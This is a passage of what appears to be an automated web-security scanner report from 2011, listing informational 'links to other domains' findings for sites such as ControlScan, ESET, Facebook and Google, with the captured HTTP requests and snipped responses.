</b>&nbsp;&nbsp;<a href="http://auto.webalta.ru" target="_blank">........</a>&nbsp;&nbsp;<a href="http://kino.webalta.ru" target="_blank">........</a><a href="http://pogoda.webalta.ru" target="_blank">............</a>&nbsp;&nbsp;<a href="http://games.webalta.ru" target="_blank">........</a>
...[SNIP]...
<div class="floatR"><a href="http://my.webalta.ru/" target="_blank">...... ................</a>
...[SNIP]...
<a href="/"><img src="http://img.webalta.ru/public/images/logo200x80.png" width="200" height="80"></a>
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/10345451560/' target='_blank'><img id='newsID0_img' src="http://img.webalta.ru/newsImg/news_0.jpg?55718" width="100" height="100"></a>
                        <a id='newsID0_title' class="news-title" href='http://justanews.ru/general/10345451560/' target='_blank'>.. ........................ ................ .......... .................. ....................</a>
...[SNIP]...
<br>
                       <a id='newsID0_text' href="http://justanews.ru/general/10345451560/" target='_blank'>.. .............. .......... .. .......... ...... ........ .................... ........ .... ............ .................. - ................ .. 1493 ........ .. ................ ...................
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/11478849322/' target='_blank'><img id='newsID1_img' src="http://img.webalta.ru/newsImg/news_1.jpg?55718" width="100" height="100"></a>
                        <a id='newsID1_title' class="news-title" href='http://justanews.ru/general/11478849322/' target='_blank'>.... ........ .................. .......... ....................</a>
...[SNIP]...
<br>
                       <a id='newsID1_text' href="http://justanews.ru/general/11478849322/" target='_blank'>.. ........................ ................ .......... .................. .......... .........., .................... ................ Stars. .... ........ .... .............. .... ...................
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/8272959774/' target='_blank'><img id='newsID2_img' src="http://img.webalta.ru/newsImg/news_2.jpg?55718" width="100" height="100"></a>
                        <a id='newsID2_title' class="news-title" href='http://justanews.ru/general/8272959774/' target='_blank'>SpaceX .................. .............. .... ........ .......... 10-20 ......</a>
...[SNIP]...
<br>
                       <a id='newsID2_text' href="http://justanews.ru/general/8272959774/" target='_blank'>SpaceX ............................ ................ ................ .... ........ .. .................. 10-20 ....... .... ........ ............ ........................ ................ ........ ...
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/8111385468/' target='_blank'><img id='newsID3_img' src="http://img.webalta.ru/newsImg/news_3.jpg?55718" width="100" height="100"></a>
                        <a id='newsID3_title' class="news-title" href='http://justanews.ru/general/8111385468/' target='_blank'>.... .............. .............. .................. .............. .................................... ..........</a>
...[SNIP]...
<br>
                       <a id='newsID3_text' href="http://justanews.ru/general/8111385468/" target='_blank'>.. .................... ........................, ...................... ........................ ...... .. ......, .. ...................... ........ .................. ............ .............. ..
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/8279317407/' target='_blank'><img id='newsID5_img' src="http://img.webalta.ru/newsImg/news_5.jpg?55718" width="100" height="100"></a>
                        <a id='newsID5_title' class="news-title" href='http://justanews.ru/general/8279317407/' target='_blank'>............ .................. .... ..............</a>
...[SNIP]...
<br>
                       <a id='newsID5_text' href="http://justanews.ru/general/8279317407/" target='_blank'>.. .................... ................ .................. ............. .. ........................ .............., .................. .. ........................ .......... ...... .............. ...
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/9412017149/' target='_blank'><img id='newsID6_img' src="http://img.webalta.ru/newsImg/news_6.jpg?55718" width="100" height="100"></a>
                        <a id='newsID6_title' class="news-title" href='http://justanews.ru/general/9412017149/' target='_blank'>.......... ............ ...................... .............. ............ .. ............ .... ............ ....-2011</a>
...[SNIP]...
<br>
                       <a id='newsID6_text' href="http://justanews.ru/general/9412017149/" target='_blank'>.............. ............ .............. ............ .... ............ ................ .......... .................... .............., .............. .......... ........................ ...........
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/9144492183/' target='_blank'><img id='newsID7_img' src="http://img.webalta.ru/newsImg/news_7.jpg?55718" width="100" height="100"></a>
                        <a id='newsID7_title' class="news-title" href='http://justanews.ru/general/9144492183/' target='_blank'>............ .............. .......................... .. .............. ............</a>
...[SNIP]...
<br>
                       <a id='newsID7_text' href="http://justanews.ru/general/9144492183/" target='_blank'>.................... .......... ............................ .............. ...... ............ .............. .......... ...... .......... .................. .............. ............. .... ........
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/10457898583/' target='_blank'><img id='newsID8_img' src="http://img.webalta.ru/newsImg/news_8.jpg?55718" width="100" height="100"></a>
                        <a id='newsID8_title' class="news-title" href='http://justanews.ru/general/10457898583/' target='_blank'>.................. .................. .. ........ ....-.... .......... ......S....</a>
...[SNIP]...
<br>
                       <a id='newsID8_text' href="http://justanews.ru/general/10457898583/" target='_blank'>.................................. ................ Gala Records (................. ..............) ............ ...... .. ...... .................. .... ............ ...................... ...........
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/11425643234/' target='_blank'><img id='newsID9_img' src="http://img.webalta.ru/newsImg/news_9.jpg?55718" width="100" height="100"></a>
                        <a id='newsID9_title' class="news-title" href='http://justanews.ru/general/11425643234/' target='_blank'>.............. ...... ........ 12 ...... .... ................ ..................</a>
...[SNIP]...
<br>
                       <a id='newsID9_text' href="http://justanews.ru/general/11425643234/" target='_blank'>.................... ................ .............. ...... .................... .......................... ...... .............. .................... .. 12 .......... .............. .... .............
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/9193279130/' target='_blank'><img id='newsID10_img' src="http://img.webalta.ru/newsImg/news_10.jpg?55718" width="100" height="100"></a>
                        <a id='newsID10_title' class="news-title" href='http://justanews.ru/general/9193279130/' target='_blank'>............ ...................... .... ................</a>
...[SNIP]...
<br>
                       <a id='newsID10_text' href="http://justanews.ru/general/9193279130/" target='_blank'>.............................. ...... ................ ...................... .......................... .................., ........ .... ................ ........ ...... ........................ .. .
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/12132715902/' target='_blank'><img id='newsID11_img' src="http://img.webalta.ru/newsImg/news_11.jpg?55718" width="100" height="100"></a>
                        <a id='newsID11_title' class="news-title" href='http://justanews.ru/general/12132715902/' target='_blank'>Apple ............ ............ .............. ............ ............ ............ ..........</a>
...[SNIP]...
<br>
                       <a id='newsID11_text' href="http://justanews.ru/general/12132715902/" target='_blank'>............ .......... 15-.... ............ ........................ .......... ........ .................. .. .......... .......................... ................ ................ Apple, ..........
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/9877594234/' target='_blank'><img id='newsID12_img' src="http://img.webalta.ru/newsImg/news_12.jpg?55718" width="100" height="100"></a>
                        <a id='newsID12_title' class="news-title" href='http://justanews.ru/general/9877594234/' target='_blank'>................ .................. .. .......... ............ .......... ............................ ..........</a>
...[SNIP]...
<br>
                       <a id='newsID12_text' href="http://justanews.ru/general/9877594234/" target='_blank'>.................. ............ .............. ................ .... ................, ...... .......... .............................. .......... .............. .......... ...................... .. ..
...[SNIP]...
<br>
                       <a href='http://justanews.ru/general/8185753558/' target='_blank'><img id='newsID13_img' src="http://img.webalta.ru/newsImg/news_13.jpg?55718" width="100" height="100"></a>
                        <a id='newsID13_title' class="news-title" href='http://justanews.ru/general/8185753558/' target='_blank'>................ ........ ................ .............. .............. ............</a>
...[SNIP]...
<br>
                       <a id='newsID13_text' href="http://justanews.ru/general/8185753558/" target='_blank'>.................... ................ LoveFilm, .................................... .... .............. .............. .. ................, .............. .......... .. ................, .......... ..
...[SNIP]...
<!-- Yandex.Metrika -->
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript"></script>
...[SNIP]...
<div style="position:absolute"><img src="//mc.yandex.ru/watch/57617?cnt-class=1" alt="" /></div>
...[SNIP]...
23.74. https://www.controlscan.com/checkout_invalid.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.controlscan.com
Path:   /checkout_invalid.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /checkout_invalid.php?pid=&reason=Card%20Number%20was%20not%20between%2013%20and%2016%20digits HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/checkout.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.3.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:56:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- BEGIN LIVECHAT track tag. See also www.livechatinc.com -->
<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&amp;groups=0" type="text/javascript"></script>
...[SNIP]...
<!-- Verisign Seal-->
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&amp;size=M&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<!-- VTRENZ Tracking-->
<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...
<div><img src="https://s.analytics.yahoo.com/p.pl?a=1000725800122&amp;js=no" width="1" height="1" alt="" /></div>
...[SNIP]...
23.75. https://www.controlscan.com/shoppingcart.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.controlscan.com
Path:   /shoppingcart.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /shoppingcart.php?itemsadded=1 HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/shoppingcart.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.3.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:55:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- BEGIN LIVECHAT track tag. See also www.livechatinc.com -->
<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&amp;groups=0" type="text/javascript"></script>
...[SNIP]...
<!-- Verisign Seal-->
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&amp;size=M&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<!-- VTRENZ Tracking-->
<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...
<div><img src="https://s.analytics.yahoo.com/p.pl?a=1000725800122&amp;js=no" width="1" height="1" alt="" /></div>
...[SNIP]...
23.76. http://www.depthsecurity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.depthsecurity.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?gclid=CKbh46DPt6gCFcQSNAodRgFuBQ HTTP/1.1
Host: www.depthsecurity.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303732840.1.1.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303732840.1; __utmc=5781286

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6045
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 12:52:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Depth
...[SNIP]...
<li><a href="http://depthsecurity.blogspot.com" target=..._blank...>Check Out the <b>
...[SNIP]...
23.77. http://www.dmca.com/Protection/Status.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dmca.com
Path:   /Protection/Status.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /Protection/Status.aspx?id=6d6905a9-aeec-4426-921a-33dc8d0cdfb9&PAGE_ID=aHR0cDovL3d3dy5yZXB1dGF0aW9uY2hhbmdlci5jb20vc2NoZWR1bGVkLmh0bWw1 HTTP/1.1
Host: www.dmca.com
Proxy-Connection: keep-alive
Referer: http://www.reputationchanger.com/scheduled.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wubflym5pb53bt45ku4n3oa4

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: whoson=521479-61577.4253039; expires=Thu, 23-Jun-2011 23:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 16:06:17 GMT
Content-Length: 14244


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head id="ctl00_mstrHead"><title>
   Reputation Changer | Protected by DMCA Protecti
...[SNIP]...
<td><a id="ctl00_cntBody_lnkPageUrl" href="http://www.reputationchanger.com/scheduled.html" target="_blank">Visit Page</a>
...[SNIP]...
23.78. http://www.eset.com/us/business/products  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/business/products

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21066
Date: Mon, 25 Apr 2011 12:52:44 GMT
X-Varnish: 1310965243
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<li><a href="http://shopping.netsuite.com/s.nl?sc=3&amp;c=438708&amp;n=1&amp;ext=T" class="header_cart" onclick="_hbLink('Header Nav Cart');">Cart <!--(1 item)-->
...[SNIP]...
<li><a href="https://checkout.netsuite.com/c.438708/Return_Policy.html" onclick="window.open(this.href);return false;">Return Policy</a>
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</fb:like>
   <a href="http://www.facebook.com/esetusa" onclick="window.open(this.href);return false;"><img src="/us/images/social/facebook_icon.gif" alt="Visit ESET on Facebook" /></a>
<a href="http://www.twitter.com/eset" onclick="window.open(this.href);return false;"><img src="/us/images/social/twitter_icon.gif" alt="Follow ESET on Twitter" /></a>
<a href="http://www.youtube.com/user/esetusa" onclick="window.open(this.href);return false;"><img src="/us/images/social/youtube_icon.gif" alt="ESET YouTube Channel" />
...[SNIP]...
<div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
23.79. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d0bfa794%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff259c7ddf8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.150.41
X-Cnection: close
Date: Mon, 25 Apr 2011 12:52:48 GMT
Content-Length: 8179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/nogz-s5wETe.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/I8QAd_a7Pbh.js"></script>
...[SNIP]...
23.80. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=unified+vulnerability+management HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:37:47 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/rU20-FBA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 85006

<!doctype html> <head> <title>unified vulnerability management - Google Search</title> <script>window.google={kEI:"S5W1Te2mDs6Ttwel49DnDg",kEXPI:"17259,24472,25907,27147,28514,28766,28887,29050,2
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=unified+vulnerability+management&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.rapid7.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CDAQFjAA')"><em>
...[SNIP]...
<div class=osl><a href="http://www.rapid7.com/careers/" onmousedown="return clk(this.href,'','','','1','','0CDcQ0gIoADAA')">Careers</a> - <a href="http://www.rapid7.com/contact/" onmousedown="return clk(this.href,'','','','1','','0CDgQ0gIoATAA')">Contact</a> - <a href="http://www.rapid7.com/vulnerability-scanner.jsp" onmousedown="return clk(this.href,'','','','1','','0CDkQ0gIoAjAA')">Free Vulnerability Scanner</a> - <a href="http://www.rapid7.com/products/" onmousedown="return clk(this.href,'','','','1','','0CDoQ0gIoAzAA')">Products</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:P-xEVpoobVgJ:www.rapid7.com/+unified+vulnerability+management&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CDUQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.rapid7.com/solutions/technology/index.jsp" class=l onmousedown="return clk(this.href,'','','','2','','0CDwQFjAB')">Network, Web Application &amp; Database Security Solutions | Rapid7</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:NAa6OGRS2vkJ:www.rapid7.com/solutions/technology/index.jsp+unified+vulnerability+management&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CEEQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.eeye.com/Products/Retina.aspx" class=l onmousedown="return clk(this.href,'','','','3','','0CEQQFjAC')">Retina CS <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:DvH-jrdx4-cJ:www.eeye.com/Products/Retina.aspx+unified+vulnerability+management&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CEkQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://blog.eeye.com/general/unified-vulnerability-management-for-healthcare" class=l onmousedown="return clk(this.href,'','','','4','','0CEsQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Y8mD1qnuqn8J:blog.eeye.com/general/unified-vulnerability-management-for-healthcare+unified+vulnerability+management&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CFAQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.fishnetsecurity.com/Products/Detail/eEye-Unified-Vulnerability-Management" class=l onmousedown="return clk(this.href,'','','','5','','0CFIQFjAE')">FishNet Security | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:cA86V-caPkkJ:www.fishnetsecurity.com/Products/Detail/eEye-Unified-Vulnerability-Management+unified+vulnerability+management&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CFcQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://it.n-able.com/products/remote_audit_manager/features.aspx" class=l onmousedown="return clk(this.href,'','','','6','','0CFgQFjAF')">Remote Audit <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:b_oAvbaqu18J:it.n-able.com/products/remote_audit_manager/features.aspx+unified+vulnerability+management&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CF0QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.prweb.com/releases/vulnerability/management/prweb5177334.htm" class=l onmousedown="return clk(this.href,'','','','7','','0CF4QFjAG')">eEye to Showcase IT Security Solutions that Simplify <em>
...[SNIP]...
